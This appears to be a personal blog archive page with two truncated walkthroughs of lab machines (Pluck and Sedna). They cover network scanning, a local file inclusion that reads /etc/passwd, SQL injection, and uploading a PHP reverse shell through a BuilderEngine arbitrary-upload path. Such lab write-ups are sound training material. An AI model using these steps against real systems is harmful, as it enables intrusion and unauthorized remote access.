Posts

Showing posts from March, 2017

Pluck w00t!

Image
Time to Pluck!

Though a bit late, I decided to give this machine a try!

As with all almost every machine I began with arp-scan/netdiscover:


Once this is done, next I try to do a port scan on the host.

I began with the tcp scan while upd scans taking more time ran in the background.
Since port 80 was open, I ran nikto in other window.


Post this is done, I move next to check banners on each service.

SSH dint give any banner, neither mysql or llmnr protocol so I tried to enumerate the web.

Just before I went to check the web service, I looked at the nikto results and they were interesting!


Now, this was very interesting, an LFI!!

Meanwhile I had also tried fuzzing the admin page on the webservice and it revealed sql injection:


Now, I had two vectors so I thought lets begin with the LFI.

Doing a /etc/passwd dumped all the contents!!


But Trying lfi on other files like apache logs etc was not getting possible (permission issue??)

This was when something caught my eye....  There was an entr…
Image
I picked up Sedna and these were the steps:

Like any machine, starting with arp-scan to first know the machine IP:

arp-scan -l



The machine got detected at 192.168.137.152

The next step was to run an nmap scan:



From here, I decided that I shall  be concentrating on port 80.

First checking the webpage:


I decided I shall have a peek at the robots.txt as well:


going to /Hackers gave 404 -Not found! Damn! :D

Meanwhile in background, I was running gobuster.

Doing web enumeration and checking web page sources dint reveal much!
I decided to check my gobuster results:


Manually enumerating the dirbuster pointed folders, I quickly became clear that builderengine was running.

Next, a searchsploit revealed exploit for arbitrary upload in BuilderEngine.


Seems BuilderEngine is vulnerable to arbitrary file uploads on the directory:
http://IP_Addr/themes/dashboard/assets/plugins/jquery-file-upload/server/php/

I uploaded a simple php reverse shell to received reverse shell on listening port 443.



And I…